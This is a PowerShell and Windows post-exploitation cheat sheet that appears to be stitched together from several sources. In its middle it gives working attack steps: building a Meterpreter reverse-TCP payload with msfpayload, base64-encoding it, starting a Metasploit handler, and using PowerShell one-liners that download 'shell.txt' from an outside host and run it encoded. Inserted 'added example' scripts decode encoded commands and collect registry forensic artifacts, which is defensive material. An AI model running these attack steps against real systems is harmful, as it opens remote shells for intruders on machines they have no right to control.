$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
# Write to Standard Out
Write-Host $encodedCommand
Copyright 2012 TrustedSec, LLC. All rights reserved.
Please see reference [7] for disclaimer
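The encoder above produces the `-encodedCommand` strings that show up in process command lines, and the first job of anyone reviewing such a line is to reverse the two layers without executing anything. The function below is an added example, not part of the original cheat sheet or of TrustedSec's script: it decodes the outer base64/UTF-16LE layer, flags the constructs the encoder depends on, and if the decoded text carries a `FromBase64String('...')` blob fed through a `DeflateStream`, inflates that blob to recover the script text. The sample it runs on is constructed inline by wrapping a harmless `Write-Host` line the same way the encoder above wraps `audit.ps1`.

```powershell
# Added example: analyst-side decoder for -encodedCommand strings of the shape
# produced by the encoder above. Nothing decoded here is executed.
function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$EncodedCommand)

    $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($EncodedCommand))

    $indicators = [ordered]@{
        'Invoke-Expression / IEX' = '\b(Invoke-Expression|IEX)\b'
        'FromBase64String'        = 'FromBase64String'
        'Deflate / GZip stream'   = 'Compression\.(Deflate|GZip)Stream'
        'WebClient download'      = 'Net\.WebClient|Download(String|File)'
    }
    $found = foreach ($name in $indicators.Keys) {
        if ($decoded -match $indicators[$name]) { $name }
    }

    # Second layer: the base64 blob inside FromBase64String('...') is Deflate data.
    # Inflate it the same way the wrapper would, but only to read it.
    $inner = $null
    if ($decoded -match 'DeflateStream' -and $decoded -match "FromBase64String\('([A-Za-z0-9+/=]+)'\)") {
        $ms = New-Object IO.MemoryStream (,[Convert]::FromBase64String($Matches[1]))
        $ds = New-Object IO.Compression.DeflateStream ($ms, [IO.Compression.CompressionMode]::Decompress)
        $sr = New-Object IO.StreamReader ($ds, [Text.Encoding]::ASCII)
        $inner = $sr.ReadToEnd().TrimEnd()
        $sr.Close()
    }

    [pscustomobject]@{ Decoded = $decoded; Indicators = @($found); InnerScript = $inner }
}

# Constructed sample: a harmless one-liner wrapped exactly as the encoder above
# wraps audit.ps1, so both decoding layers are exercised.
$innerScript = "Write-Host 'constructed sample payload'"
$ms = New-Object IO.MemoryStream
$cs = New-Object IO.Compression.DeflateStream ($ms, [IO.Compression.CompressionMode]::Compress)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$sw.WriteLine($innerScript)
$sw.Close()
$blob    = [Convert]::ToBase64String($ms.ToArray())
$wrapped = "Invoke-Expression `$(New-Object IO.StreamReader(`$(New-Object IO.Compression.DeflateStream(`$(New-Object IO.MemoryStream(,`$([Convert]::FromBase64String('$blob')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
$sample  = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($wrapped))

$result = ConvertFrom-EncodedCommand -EncodedCommand $sample
$result.Indicators    # Invoke-Expression / IEX, FromBase64String, Deflate / GZip stream
$result.InnerScript   # Write-Host 'constructed sample payload'
```

The order of the two `-match` tests in the second-layer check matters: `$Matches` holds the captures of the last successful match, so the capturing pattern is evaluated last. The same function works on strings taken from a 4688 command line or from the PowerShell operational log; only the outer layer is guaranteed, so `InnerScript` stays `$null` when the decoded command is not of this wrapped form.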
1. msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=8080 R | msfencode -t psh -a x86
1. c:\> powershell
2. PS c:\> $cmd = 'PASTE THE CONTENTS OF THE PSH SCRIPT HERE'
3. PS c:\> $u = [System.Text.Encoding]::Unicode.GetBytes($cmd)
4. PS c:\> $e = [Convert]::ToBase64String($u)
5. PS c:\> $e
6. Copy the contents of $e
1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse_tcp
4. set LHOST 1.1.1.1
5. set LPORT 8080
6. exploit -j
1. c:\> powershell -noprofile -noninteractive -command "& {$client=new-object System.Net.WebClient; $client.DownloadFile('http://1.1.1.1/shell.txt','c:\windows\temp\shell.txt')}"
2. c:\> powershell -noprofile -noninteractive -noexit -command "& {$cmd=type 'c:\windows\temp\shell.txt';powershell -noprofile -noninteractive -noexit -encodedCommand $cmd}"
PROFIT
https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
. .\PowerUp.ps1
HKLM\Software\Microsoft\Windows NT\CurrentVersion
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v ProductName
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v SystemRoot
HKLM\System\CurrentControlSet\Control\TimeZoneInformation /v ActiveTimeBias
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU
HKLM\System\MountedDevices
HKLM\System\CurrentControlSet\Enum\USBStor
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters - IPEnableRouter = 1
HKEY_LOCAL_MACHINE\Security\Policy\Secrets
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon
HKLM\Security\Policy\PolAdtEv
HKLM\System\CurrentControlSet\Services
HKLM\Software
HKCU\Software
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU & \OpenSaveMRU
HKCU\Software\Microsoft\Internet Explorer\TypedURLs
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
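The keys above are the standard registry triage set: system identity, time zone, routing, attached storage, and the MRU lists that record what a user opened, typed and ran. The script below is an added example, not part of the original cheat sheet: it reads those keys into one object set that can be exported and diffed. It assumes the key paths as listed above, reads HKCU entries from the current user's hive (to examine another profile, load its NTUSER.DAT with `reg load` and repoint the HKCU paths, which this example does not automate), and decodes the REG_BINARY MRU and MountedDevices values as UTF-16 text where they decode cleanly.

```powershell
# Added example: collect the forensic registry artifacts listed above.
function Format-RegValue($Value) {
    # MRU and MountedDevices entries are REG_BINARY holding UTF-16 text; show the
    # text when it decodes cleanly, otherwise the raw bytes as hex.
    if ($Value -is [byte[]]) {
        $text = [Text.Encoding]::Unicode.GetString($Value)
        $nul  = $text.IndexOf([char]0)
        if ($nul -ge 0) { $text = $text.Substring(0, $nul) }
        if ($text.Length -gt 0 -and $text -notmatch '\p{C}') { return $text }
        return (($Value | ForEach-Object { $_.ToString('x2') }) -join '')
    }
    return $Value
}

function Get-RegistryTriage {
    $cv  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $exp = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer'

    # Single values.
    $values = @(
        @{ Artifact = 'ProductName';     Path = $cv; Name = 'ProductName' }
        @{ Artifact = 'InstallDate';     Path = $cv; Name = 'InstallDate' }
        @{ Artifact = 'RegisteredOwner'; Path = $cv; Name = 'RegisteredOwner' }
        @{ Artifact = 'SystemRoot';      Path = $cv; Name = 'SystemRoot' }
        @{ Artifact = 'ActiveTimeBias';  Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\TimeZoneInformation'; Name = 'ActiveTimeBias' }
        @{ Artifact = 'IPEnableRouter';  Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters';   Name = 'IPEnableRouter' }
        @{ Artifact = 'AutoAdminLogon';  Path = "$cv\Winlogon"; Name = 'AutoAdminLogon' }
    )
    foreach ($v in $values) {
        $data = (Get-ItemProperty -Path $v.Path -Name $v.Name -ErrorAction SilentlyContinue).($v.Name)
        if ($null -eq $data) { continue }
        # InstallDate is seconds since the Unix epoch, stored as a DWORD.
        if ($v.Name -eq 'InstallDate') { $data = (Get-Date '1970-01-01T00:00:00Z').ToUniversalTime().AddSeconds($data) }
        [pscustomobject]@{ Artifact = $v.Artifact; Source = "$($v.Path)\$($v.Name)"; Value = $data }
    }

    # Keys whose value names (or subkey names, for USBStor) are the evidence.
    $keys = @(
        @{ Artifact = 'MapNetworkDriveMRU'; Path = "$exp\Map Network Drive MRU";   SubKeys = $false }
        @{ Artifact = 'RunMRU';             Path = "$exp\RunMRU";                  SubKeys = $false }
        @{ Artifact = 'RecentDocs';         Path = "$exp\RecentDocs";              SubKeys = $false }
        @{ Artifact = 'LastVisitedMRU';     Path = "$exp\ComDlg32\LastVisitedMRU"; SubKeys = $false }
        @{ Artifact = 'OpenSaveMRU';        Path = "$exp\ComDlg32\OpenSaveMRU";    SubKeys = $false }
        @{ Artifact = 'TypedURLs';          Path = 'HKCU:\Software\Microsoft\Internet Explorer\TypedURLs'; SubKeys = $false }
        @{ Artifact = 'MountedDevices';     Path = 'HKLM:\SYSTEM\MountedDevices';                      SubKeys = $false }
        @{ Artifact = 'USBStor';            Path = 'HKLM:\SYSTEM\CurrentControlSet\Enum\USBStor';      SubKeys = $true }
    )
    foreach ($k in $keys) {
        if (-not (Test-Path -LiteralPath $k.Path)) { continue }
        $key = Get-Item -LiteralPath $k.Path
        if ($k.SubKeys) {
            foreach ($sub in $key.GetSubKeyNames()) {
                [pscustomobject]@{ Artifact = $k.Artifact; Source = $k.Path; Value = $sub }
            }
        } else {
            foreach ($name in $key.GetValueNames()) {
                $raw = $key.GetValue($name)
                [pscustomobject]@{ Artifact = $k.Artifact; Source = "$($k.Path)\$name"; Value = (Format-RegValue $raw) }
            }
        }
    }
}

# Usage: keep the CSV with the case notes; re-run later and diff to see what changed.
Get-RegistryTriage | Export-Csv -Path .\registry-triage.csv -NoTypeInformation
```

`HKLM\Security\Policy\Secrets` and `PolAdtEv` from the list above are deliberately not read here: the SECURITY hive is not readable from a normal administrative session without additional privilege, and its contents are credential material, so collect that hive with `reg save` as shown earlier in the page and keep it with the same handling as the SAM.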